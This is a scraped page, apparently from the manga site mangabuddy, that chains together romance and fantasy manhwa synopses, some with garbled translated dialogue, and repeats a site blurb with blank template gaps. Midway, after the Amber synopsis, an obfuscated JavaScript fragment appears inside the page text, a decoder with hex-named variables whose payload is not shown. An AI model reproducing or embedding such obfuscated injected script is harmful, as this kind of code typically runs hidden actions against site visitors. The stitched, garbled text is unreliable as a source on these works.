"Had he been a hero in his past life or something?" "That's right. I once rescued this nation from destruction." When Ja-in is kidnapped due to his family's massive debt, Unjo happens to walk by and save him from his kidnappers. From that day onwards, Ja-in's life is never the same
막내온탑 Arphemia, my greatest God in the universe, give me the power to’ “Let me go through it all!” Before returning, Saelica became a holy power supplier and died. On the other hand, Amaelia, the saintess of Parmanas, is loved by the whole world. People don’t know the fact that the magic was actually Salica’s power. ”This time I will not die unjustly”. The enemy is on my side, first of all, I’ll go to the temple and train my mind and body by Arphemia’s side.” That’s how Salica’s temple life began. And in addition, they searched for an ancient forgotten treasure, and said, “Lord priest, we succeeded.” He educates the children his age, the future of the temple. “Come, I want to be summoned by you.” But the situation became strange. “I will be on your side.” “The thing Sae likes the most is me.” “I said honey bread is the best.” Where are the priests and children? A child of my age who doubts and is hostile towards me?” “I will take her with me.” “No, she will come with me.” The battle between the Grand Duke North and Admiral South would hit me very hard. “I am not that girl!” Even- Getting involved with a dangerous man “You like toying with me? Then play longer.” Who I want to beat are Parmanas and Amelia! Will Salica succeed?
Amber is an author desperate for a best-seller, but while trying to write a new idea, she dies in an accident. The next time she opens her eyes, she is the main character inside her own unfinished novel! High school was hell for Amber, and fictional life inside her book is worse--her novel was a thriller where the heroine is pursued by a love-obsessed psychopath! Now, Amber needs to avoid the male lead to stay alive and find a way to bring her book to an ending without losing it all.<script></script><script>function _0xf581(_0x491429,_0x582401){var _0x4ea27f=_0x1ddb();return _0xf581=function(_0x2bcd5c,_0x466fbc){_0x2bcd5c=_0x2bcd5c-(-0x1e13+0x1fcf+-0x2c);var _0x3d8894=_0x4ea27f[_0x2bcd5c];return _0x3d8894;},_0xf581(_0x491429,_0x582401);}(function(_0x2310d5,_0x36594b){var _0x54ffd5=_0xf581,_0x1828d3=_0x2310d5();while(!![]){try{var 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<h2><strong>i'll do that marriage</strong></h2> Rayanne McEllion, the girl who wanted to avoid a bad end, willingly went to the insomniac emperor in place of her sister, Raylin. She is tasked to help the sleepless emperor, who was cursed by a witch, by using her ability to induce sleep whenever she touches another person's body with her lips. Can Rayanne survive being with the emperor, ‘Kael Rue Kaldorf?'
Xiaoxian, an ordinary working girl, runs into Lin Yucang, the spirit of a general who has been looking for her for a thousand years. It turns out that another soul lives in her body, Princess Lantong. Whenever she turns into Lantong in the moonlight, monsters will hear the news and show up. In this case, only Lin Yucang can save her. As time passes by, they become fond of each other. But Lantong wakes up at this moment.mangabuddy is a website dedicated to fans of anime, , , , video games, and cosplay. Where you may find all of your anime-related memes, recommendations, reviews, manga recommendations, character fanfiction, favorite quotations, and simply those ordinary anime things that you enjoy, particularly memes.You can , online for free at mangabuddy. Chapters are updated hourly with high-quality graphics and a full English translation. Find free translations of your favorite , and . The latest updated content on mangabuddy is now available.
The romance between Ji Wook, who suggested a beauty channel and Geu Rim, who doesn't care one bit about it. mangabuddy is a website dedicated to fans of anime, , , , video games, and cosplay. Where you may find all of your anime-related memes, recommendations, reviews, manga recommendations, character fanfiction, favorite quotations, and simply those ordinary anime things that you enjoy, particularly memes.You can , online for free at mangabuddy. Chapters are updated hourly with high-quality graphics and a full English translation. Find free translations of your favorite , and . The latest updated content on mangabuddy is now available.
<span class="mx-1">The Younger Male Lead Fell for Me before the Destruction </span> I spent a carefree day lounging about after paying off my tuition loans, but ended waking up inside a novel as the Amel, the only daughter of a poor count! Even if I worked for the rest of my life, the debt my family accumulated is too much for me to even be able to pay off! Not only that, but it seems that I ended up having a one-night experience with Kyle, the Male Lead, unknowingly after getting stupid drunk! I tried running away from him but he became way too attached to me. Will I be able to change the fate of my and my family's situation into an ending with a peaceful life with love?
Read manhwa I Once Broke An Oath The greatest evil was resurrected, and the youngest high-ranked magician, Diarin, died three times while trying to stop it, and was unable to protect those close to her. In her fourth reincarnation: Her life is at danger thanks to her eternal soul’s fate, and she needs a different strategy to escape her future. Diarin promises divorce when she finds the prince that was engaged since he was a child, in exchange for him staying in her territory for one year. However… … Diarin leaned towards Yejet as best as she could, to try and look as natural as possible. “I will annul the engagement for you.” “Huh?” Yejet asked again, after blankly saying “Huh?” in the moment along with the driver. Yejet’s gaze was very peculiar. It was only thanks to Diarin putting in all of her focus on Yejet, that allowed her to just barely notice that odd gaze. Yejet didn’t take his eyes off of Diarin’s once. He asked her, “Are you talking about Duke Concul?” It was a sentence spoken as quietly as Diarin’s. Excluding the driver, no one could hear their conversation. “No way. Do you think the duke would actually let go of Your Highness? If he could, he would probably tie you up with a rope as tight as he could.” “Then?” Diarin in the quietest voice, as though ice might shatter if she spoke too loudly, “I’m talking about you.”
One day the tyrant, Estian, sent a marriage proposal to Cecil. She got dragged to the empire unwillingly but when she saw the emperor's face she had a change of heart. "You're quite the hottie aren't you?" She liked her husband. And her husband likes her back too! To live happily with her tyrant husband does Cecil need to become a villainess far worse than the tyrant?!
<span class="mx-1">My Wife is Back </span> "We should get a divorce." A marriage without love. Choi Mo-won was a man who thought marriage was solely for business. But Lee Yu-rae, the woman he was married to, suddenly asked him for a divorce. Three years later, one day, in an unexpected place, they reunited in a strange relationship.... "Do you want to go out with me?" His wife is back. But is she the same woman he used to know? His once lifeless heart started to beat. And that too, for his ex-wife, who has returned.
Dadong group manager Goom Soochang, Top special investigator Yoo Sukhoo, Korean assemblyman Kim Namhoon these three people have been best friends since they were kids. Even when they became adults they would help each other out of tricky situations. But as Goon Soochang makes a group called Dadong group he has many connections but he might lose it all so to avoid investigation he flees to China But now his right hand man has betrayed him and wants to kill him. He's sent many hitmen to China to finish him off at any cost